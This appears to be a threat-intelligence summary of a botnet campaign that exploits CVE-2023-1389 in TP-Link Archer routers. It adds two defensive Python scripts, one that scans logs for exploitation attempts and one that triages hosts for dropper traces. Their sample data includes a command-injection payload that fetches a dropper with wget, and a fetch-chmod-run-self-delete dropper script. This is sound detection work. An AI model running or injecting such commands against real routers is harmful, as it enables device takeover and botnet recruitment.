A recent global campaign has been identified that targets TP-Link Archer routers through a remote code execution (RCE) vulnerability, CVE-2023-1389. The campaign exploits the routers to build a botnet, with the potential for widespread impact given how many vulnerable devices are exposed to the internet. The malware dropper uses a bash script to install and execute additional malware while employing evasion techniques. Affected: IoT devices, TP-Link Archer routers
Keypoints :
- A global IoT botnet campaign targets TP-Link Archer routers through CVE-2023-1389.
- The vulnerability persists because users rarely apply firmware updates and manufacturers neglect security.
- The botnet is believed to remain active, with over 6,000 vulnerable devices detected.
- The campaign uses a malware dropper that executes further payloads on the device and attempts to spread to other devices.
- The threat actor behind this campaign is possibly based in Italy and has adapted its tactics to evade detection.
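As an added example (not code from the original report), the following Python script flags exploitation attempts against the locale form in Archer web-interface access logs, the entry point the campaign relies on. The endpoint and parameter names (/cgi-bin/luci/;stok=/locale, form=country, operation=write, country=...) come from the public CVE-2023-1389 description, not from this page. The log format and every log line are constructed for the example; the optional trailing quoted field stands in for a logged request body (for instance nginx's $request_body), which stock access logs do not record.

```python
"""
Flag CVE-2023-1389 exploitation attempts in HTTP access logs from a
TP-Link Archer web interface, or from a proxy/honeypot placed in front of it.

Added illustrative example, not code from the original report. Endpoint and
parameter names come from the public CVE-2023-1389 description. The log
format and all log lines are constructed; the trailing quoted field models a
logged request body, which stock access logs do not capture.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOCALE_ENDPOINT = "/cgi-bin/luci/;stok=/locale"

# Shell constructs that turn a two-letter country code into a command.
SHELL_META = re.compile(r"\$\(|`|;|\||&&|>|<")

# Combined-log style line with an optional trailing quoted request body.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+'
    r'(?: "(?P<body>[^"]*)")?$'
)

# Constructed sample log: a LAN admin saving the locale, a scanner reading the
# form, a command injection through the country parameter, unrelated traffic.
SAMPLE_LOG = [
    '192.168.0.10 - - [12/Mar/2025:10:01:02 +0000] "POST /cgi-bin/luci/;stok=/locale'
    '?form=country&operation=write HTTP/1.1" 200 42 "country=US"',
    '203.0.113.7 - - [12/Mar/2025:10:05:11 +0000] "GET /cgi-bin/luci/;stok=/locale'
    '?form=country&operation=read HTTP/1.1" 200 88',
    '198.51.100.23 - - [12/Mar/2025:10:05:12 +0000] "POST /cgi-bin/luci/;stok=/locale'
    '?form=country&operation=write&country=%24%28wget%20http%3A%2F%2F198.51.100.23'
    '%2Fdropper.sh%20-O%20%2Ftmp%2Fd.sh%29 HTTP/1.1" 200 42',
    '192.168.0.10 - - [12/Mar/2025:10:06:00 +0000] "GET /cgi-bin/luci/;stok=/admin/status'
    '?form=all HTTP/1.1" 200 1024',
]


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(line):
    """None for unrelated lines; otherwise a dict whose verdict is
    'locale_request' (a plain hit on the vulnerable form: normal from the LAN,
    worth noting from the WAN) or 'exploit_attempt' (country carries shell
    metacharacters)."""
    rec = parse_line(line)
    if rec is None:
        return None
    parts = urlsplit(rec["target"])  # urlsplit keeps ';stok=' inside the path
    if not unquote(parts.path).startswith(LOCALE_ENDPOINT):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if rec["body"]:  # payload may travel in the POST body instead of the query
        for key, vals in parse_qs(rec["body"], keep_blank_values=True).items():
            params.setdefault(key, []).extend(vals)
    if params.get("form", [""])[0] != "country":
        return None
    country = params.get("country", [""])[0]
    verdict = "exploit_attempt" if SHELL_META.search(country) else "locale_request"
    return {"verdict": verdict, "src": rec["src"], "ts": rec["ts"],
            "operation": params.get("operation", [""])[0], "payload": country}


def scan(lines):
    return [hit for hit in map(classify, lines) if hit]


def exploit_attempts(lines):
    return [h for h in scan(lines) if h["verdict"] == "exploit_attempt"]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["verdict"], hit["src"], hit["operation"], repr(hit["payload"]))
```

Feed real lines from the log file to scan() to use it. Because the injected command can sit in a POST body, an access log without body logging only reveals the hit on the vulnerable form; the exploit verdict needs body logging, a WAF or an IDS in front of the router. Any hit on this form from a WAN address is already worth investigating, since the form is only meant to be reached from the LAN management interface.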
MITRE Techniques :
- T1071.001: Application Layer Protocol: Web Protocols – Uses HTTP to communicate with the C2 server and receive commands.
- T1222.002: File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification – Sets full permissions on the dropper file so it can execute.
- T1070.004: Indicator Removal: File Deletion – The dropper deletes itself after execution to avoid detection.
- T1083: File and Directory Discovery – The malware attempts to access various sensitive system files.
- T1059.004: Command and Scripting Interpreter: Unix Shell – Executes shell commands on compromised devices.
- T1499: Endpoint Denial of Service – Executes distributed denial-of-service (DDoS) attacks upon command.
- T1190: Exploit Public-Facing Application – Exploits the CVE-2023-1389 vulnerability to spread across devices.
- T1057: Process Discovery – Enumerates running processes to find and kill previous instances of itself, avoiding detection.
- T1005: Data from Local System – Reads configuration files potentially for malicious activities.
- T1573: Encrypted Channel – Sets up an encrypted C2 communication channel.
- T1569.002: System Services: Service Execution – Maintains a background thread for continuous operation.
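The dropper behaviours in this list (a shell script that installs and runs further malware, T1059.004; full permissions on the dropped file, T1222.002; self-deletion after starting, T1070.004) leave host-side traces that can be checked without a sample of the malware. The following Python triage script is an added example, not the campaign's code or code from the original report: it looks for processes whose /proc/<pid>/exe link is marked deleted, world-writable executables in temp directories, and shell scripts with a fetch-chmod-run-self-delete shape. The inventory and the script text it runs on are constructed, and the indicator regexes are generic heuristics, not signatures from the report.

```python
"""
Host-side triage for dropper traits: self-deleting executable (T1070.004),
full permissions on the dropped file (T1222.002) and a fetch-and-run shell
script (T1059.004).

Added illustrative example, not code from the original report. The sample
inventory and sample script are constructed; the regexes are generic
heuristics, not indicators from the report.
"""
import os
import re
import stat

# Generic dropper-script shapes (assumed heuristics, not report signatures).
INDICATORS = {
    "download": re.compile(r"\b(wget|curl|tftp|ftpget)\b"),
    "chmod": re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b"),
    "exec_from_tmp": re.compile(r"(^|\s)\./\S+|\b(sh|bash)\s+/(tmp|var/tmp|dev/shm)/", re.M),
    "self_delete": re.compile(r"\brm\s+-r?f\s+\S*\$0"),
}

# Constructed sample dropper script (fetch, chmod, run, remove itself).
SAMPLE_SCRIPT = """#!/bin/sh
cd /tmp || cd /var/run
wget http://198.51.100.23/bot.mips -O bot
chmod 777 bot
./bot
rm -f "$0"
"""

# Constructed inventory of a compromised host, shaped like collect_live() output.
SAMPLE_PROC_EXE = {1: "/sbin/init", 812: "/usr/sbin/dropbear", 4412: "/tmp/bot (deleted)"}
SAMPLE_FILES = {"/tmp/d.sh": 0o777, "/tmp/sess_1a2b": 0o600, "/var/tmp/cache.bin": 0o644}
SAMPLE_SCRIPTS = {"/tmp/d.sh": SAMPLE_SCRIPT}


def find_deleted_exe_processes(proc_exe):
    """proc_exe maps pid -> readlink('/proc/<pid>/exe'). A dropper that unlinks
    its own file keeps running; the kernel appends ' (deleted)' to the link."""
    return sorted(pid for pid, exe in proc_exe.items() if exe.endswith(" (deleted)"))


def find_world_writable_executables(files):
    """files maps path -> permission bits. chmod 777 leaves o+w and o+x set,
    which nothing legitimate in a temp directory needs."""
    return sorted(p for p, mode in files.items()
                  if mode & stat.S_IWOTH and mode & stat.S_IXOTH)


def script_indicators(text):
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def looks_like_dropper(text):
    hits = set(script_indicators(text))
    return "download" in hits and bool(hits & {"chmod", "exec_from_tmp"})


def triage(proc_exe, files, scripts):
    return {
        "deleted_exe_pids": find_deleted_exe_processes(proc_exe),
        "world_writable_exec": find_world_writable_executables(files),
        "dropper_scripts": sorted(p for p, t in scripts.items() if looks_like_dropper(t)),
    }


def collect_live(tmp_dirs=("/tmp", "/var/tmp", "/dev/shm")):
    """Build the three inventories from a running Linux host (root sees every pid)."""
    proc_exe, files, scripts = {}, {}, {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            proc_exe[int(pid)] = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue  # kernel thread, already exited, or permission denied
    for d in tmp_dirs:
        for root, _, names in os.walk(d):
            for name in names:
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode):
                    continue
                files[path] = stat.S_IMODE(st.st_mode)
                if st.st_size <= 65536:
                    try:
                        with open(path, "rb") as fh:
                            head = fh.read(65536)
                    except OSError:
                        continue
                    if head.startswith(b"#!"):
                        scripts[path] = head.decode("utf-8", "replace")
    return proc_exe, files, scripts


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_PROC_EXE, SAMPLE_FILES, SAMPLE_SCRIPTS), indent=2))
    # On a Linux host, run against live data with:
    # print(json.dumps(triage(*collect_live()), indent=2))
```

triage() works on plain dicts so it can be tested offline; collect_live() fills those dicts from /proc and the temp directories on a Linux host. A deleted exe link is also what a daemon looks like after a package upgrade until it restarts, so treat the output as triage leads to pivot on (network connections of the pid, its cmdline, its parent), not as verdicts.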
Indicators of Compromise :
- No IoCs found